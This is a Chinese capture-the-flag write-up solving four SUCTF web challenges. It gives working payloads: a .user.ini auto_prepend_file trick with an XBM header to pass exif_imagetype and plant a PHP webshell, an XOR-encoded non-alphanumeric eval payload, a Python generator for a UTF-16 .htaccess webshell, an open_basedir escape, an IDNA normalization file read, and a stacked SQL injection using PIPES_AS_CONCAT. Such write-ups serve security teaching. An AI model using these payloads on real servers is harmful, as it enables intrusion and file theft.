CheckIn

1、进入题目后是一个简单的上传页面:
在这里插入图片描述
先尝试上传普通的图片马,发现会显示<? in contents!,过滤了<?,可以使用<script language='php'></scrip>绕过。

修改后再次上传发现显示exif_imagetype:not image!,还用了exif_imagetype()进行检验,可以加上GIF89a进行绕过。
在这里插入图片描述
但是后缀正则过滤了php字符,想直接绕过是没戏了。

2、于是考虑解析漏洞,发现服务端不是Apache而是Nginx,所以常见的上传.hatcess文件不可行。
在这里插入图片描述

参考这篇文章:user.ini文件构成的PHP后门

php.ini一定很熟悉了,是php中的配置文件,其中提到了.user.ini文件:

链接:https://www.php.net/manual/zh/configuration.changes.modes.php
在这里插入图片描述

再看一下文档对于.user.ini文件的解释:

链接:https://www.php.net/manual/zh/configuration.file.per-user.php

在这里插入图片描述
简单来说,它起的作用和.htaccess文件差不多,可以通过在目录下增加.user.ini文件来修改一些配置,可以通过.user.ini文件设置除了PHP_INI_SYSTEM以外的所有模式的选项,且不需要重启服务器中间件,只需要等待user_ini.cache_ttl所设置的时间(默认为300秒),即可被重新加载。

下面就找php.ini中可以利用的配置项,如下:
在这里插入图片描述
auto_prepend_file配置项可以指定在主文件之前自动解析的文件的名称,并包含该文件,就像使用require函数调用它一样。

注:还有一个auto_append_file选项,是在解析后进行包含。

利用这两个配置项进行包含的前提是含有.user.ini的文件夹下需要有正常的php文件。

4、利用上述配置项进行包含的前提是:含有.user.ini的文件夹下需要有正常的php文件。

刚刚上传测试的时候也发现了index.php文件正好就在我们上传的目录下,正好可以利用.

下面还需要让.user.ini文件绕过exif_imagetype()的检测,这时候就不能加GIF89a了,否则配置文件将无法被解析,在配置文件中#为注释,可以在文件开头添加如下内容进行绕过:

1
2
3
4
#define width 20
#define height 10

auto_prepend_file=shell.jpg

采用xbm格式X Bit Map,绕过exif_imagetype()方法的检测,上传文件来解析。

在计算机图形学中,X Window系统使用X BitMap,一种纯文本二进制图像格式,用于存储X GUI中使用的光标和图标位图。
XBM数据由一系列包含单色像素数据的静态无符号字符数组组成,当格式被普遍使用时,XBM通常出现在标题.h文件中,每个图像在标题中存储一个数组。

也就是用c代码来标识一个xbm文件,前两个#defines指定位图的高度和宽度【以像素为单位,比如以下xbm文件:

#define test_width 16
#define test_height 7

5、成功上传.user.ini文件:
在这里插入图片描述

接下来上传包含一句话木马的jpg文件:
在这里插入图片描述

这样我们上传的文件就被包含在同目录的那个index.php中了,然后连接此文件即可。

在这里插入图片描述


EasyPHP

1、进入题目后,源码显示在了页面上:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
<?php
function get_the_flag(){
// webadmin will remove your upload file every 20 min!!!!
$userdir = "upload/tmp_".md5($_SERVER['REMOTE_ADDR']);
if(!file_exists($userdir)){
mkdir($userdir);
}
if(!empty($_FILES["file"])){
$tmp_name = $_FILES["file"]["tmp_name"];
$name = $_FILES["file"]["name"];
$extension = substr($name, strrpos($name,".")+1);
if(preg_match("/ph/i",$extension)) die("^_^");
if(mb_strpos(file_get_contents($tmp_name), '<?')!==False) die("^_^");
if(!exif_imagetype($tmp_name)) die("^_^");
$path= $userdir."/".$name;
@move_uploaded_file($tmp_name, $path);
print_r($path);
}
}

$hhh = @$_GET['_'];

if (!$hhh){
highlight_file(__FILE__);
}

if(strlen($hhh)>18){
die('One inch long, one inch strong!');
}

if ( preg_match('/[\x00- 0-9A-Za-z\'"\`~_&.,|=[\x7F]+/i', $hhh) )
die('Try something else!');

$character_type = count_chars($hhh, 3);
if(strlen($character_type)>12) die("Almost there!");

eval($hhh);
?>

代码分为两部分,上面是get_the_flag()函数,应该是一个文件上传功能的验证函数,下面是通过_传参进去,如果能通过一系列的检验则可以执行eval()函数。

如果这题是考RCE的话,为什么还要给出文件上传的代码呢…再看那些过滤,几乎很难去绕过,于是考虑调用get_the_flag()函数来看看可不可以通过文件上传功能。

2、所以接下来要构造payload绕过正则检测并且调用get_the_flag(),这里的过滤非常严格,几乎过滤了所有可见字符,仔细看下这篇文章:一些不包含数字和字母的webshell 就懂了如何绕过。

可以利用不可见字符的异或来构造,脚本如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
<?php
$payload = '';

for($i=0;$i<strlen($argv[1]);$i++)
{
for($j=0;$j<255;$j++)
{
$k = chr($j)^chr(255); //dechex(255) = ff
if($k == $argv[1][$i])
$payload .= '%'.dechex($j);
}
}
echo $payload;

得到:
在这里插入图片描述

所以尝试:

1
${%ff%ff%ff%ff^%a0%b8%ba%ab}{%ff}();&%ff=phpinfo

在这里插入图片描述

发现成功,于是构造payload:

1
${%ff%ff%ff%ff^%a0%b8%ba%ab}{%ff}();&%ff=get_the_flag

3、接下来就是通过上传来getshell了,这里确实是需要上传.htaccess文件了,绕过方式可以参考这篇文章:https://www.cnblogs.com/wfzWebSecuity/p/11207145.html

  • exif_imagetype() 的绕过方式和上面一样
  • 这里注意到php版本为7.2所以,不能用<script>标签绕过<?的过滤了,可以通过编码进行绕过,如原来使用utf8编码,如果shell中是用utf16编码则可以Bypass
    在这里插入图片描述
    直接利用脚本生成文件:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
SIZE_HEADER = b"\n\n#define width 1337\n#define height 1337\n\n"

def generate_php_file(filename, script):
phpfile = open(filename, 'wb')

phpfile.write(script.encode('utf-16be'))
phpfile.write(SIZE_HEADER)

phpfile.close()

def generate_htacess():
htaccess = open('.htaccess', 'wb')

htaccess.write(SIZE_HEADER)
htaccess.write(b'AddType application/x-httpd-php .lethe\n')
htaccess.write(b'php_value zend.multibyte 1\n')
htaccess.write(b'php_value zend.detect_unicode 1\n')
htaccess.write(b'php_value display_errors 1\n')

htaccess.close()

generate_htacess()

generate_php_file("shell.lethe", "<?php eval($_GET['cmd']); die(); ?>")

然后利用Postman分别构造上传.htaccessshell.lethe:

在这里插入图片描述

得到文件路径后,就可以利用shell.lethe执行命令了,但是还需要绕过open_basedir

参考:
从PHP底层看open_basedir bypass

于是构造payload如下:
?cmd=chdir('/tmp');mkdir('lethe');chdir('lethe');ini_set('open_basedir','..');chdir('..');chdir('..');chdir('..');chdir('..');ini_set('open_basedir','/');var_dump(ini_get('open_basedir'));var_dump(glob('*'));

在这里插入图片描述

得到flag位置后,最后读取flag即可,payload:
?cmd=chdir('/tmp');mkdir('lethe');chdir('lethe');ini_set('open_basedir','..');chdir('..');chdir('..');chdir('..');chdir('..');ini_set('open_basedir','/');var_dump(ini_get('open_basedir'));var_dump(file_get_contents(THis_Is_tHe_F14g));

在这里插入图片描述


Pythonginx

进入页面后给了源码:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
@app.route('/getUrl', methods=['GET', 'POST'])
def getUrl():
url = request.args.get("url")
host = parse.urlparse(url).hostname
if host == 'suctf.cc':
return "我扌 your problem? 111"
parts = list(urlsplit(url))
host = parts[1]
if host == 'suctf.cc':
return "我扌 your problem? 222 " + host
newhost = []
for h in host.split('.'):
newhost.append(h.encode('idna').decode('utf-8'))
parts[1] = '.'.join(newhost)
#去掉 url 中的空格
finalUrl = urlunsplit(parts).split(' ')[0]
host = parse.urlparse(finalUrl).hostname
if host == 'suctf.cc':
return urllib.request.urlopen(finalUrl).read()
else:
return "我扌 your problem? 333"

<!-- Dont worry about the suctf.cc. Go on! -->
<!-- Do you know the nginx? -->

这题的出题思路来自于今年BlackHat的一个议题,相关PPT如下:
https://i.blackhat.com/USA-19/Thursday/us-19-Birch-HostSplit-Exploitable-Antipatterns-In-Unicode-Normalization.pdf

其中关于Python的内容如下:
在这里插入图片描述
这里给出altman学长写的一个脚本,用来寻找可用字符:

1
2
3
4
5
6
7
8
9
10
# coding:utf-8 
for i in range(128,65537):
tmp=chr(i)
try:
res = tmp.encode('idna').decode('utf-8')
if("-") in res:
continue
print("U:{} A:{} ascii:{} ".format(tmp, res, i))
except:
pass

下面就是寻找利用方式了,根据题目中的提示:

  • 前面的url部分应该是suctf.cc
  • 还提到了Nginx,Nginx的配置文件目录为:/usr/local/nginx/conf/nginx.conf

跑上述脚本的的时候,其中有一个可利用字符:
在这里插入图片描述
由此可以想到构造:file://suctf.c℆sr/local/nginx/conf/nginx.conf(另一种绕过方式是利用来代替c及进行绕过),这样可以读到flag的位置:

在这里插入图片描述

最后构造payload:file://suctf.c℆sr/fffffflag


Easysql

(题目好像出现了不少非预期解,而且比赛过程中甚至泄露了源码…)

进入页面后,提示要求输入正确的Flag即可获得flag,存在堆叠注入如下,但是过滤了flag。
在这里插入图片描述

根据输入的回显大致判断查询语句为:.. POST['query']||flag ...

非预期解

构造payload:*,1,这样拼接后得到:select *,1||flag from Flag ,即可以查出当前表中全部内容。
在这里插入图片描述
预期解

由于作者没有过滤全,出现了非预期解,而预期解是:通过堆叠注入,设置sql_mode的值为PIPES_AS_CONCAT,从而将||视为字符串的连接操作符而非或运算符。

所以payload为:1;set sql_mode=PIPES_AS_CONCAT;select 1

这样输出的flag会与1进行拼接,得到:

在这里插入图片描述


upload labs2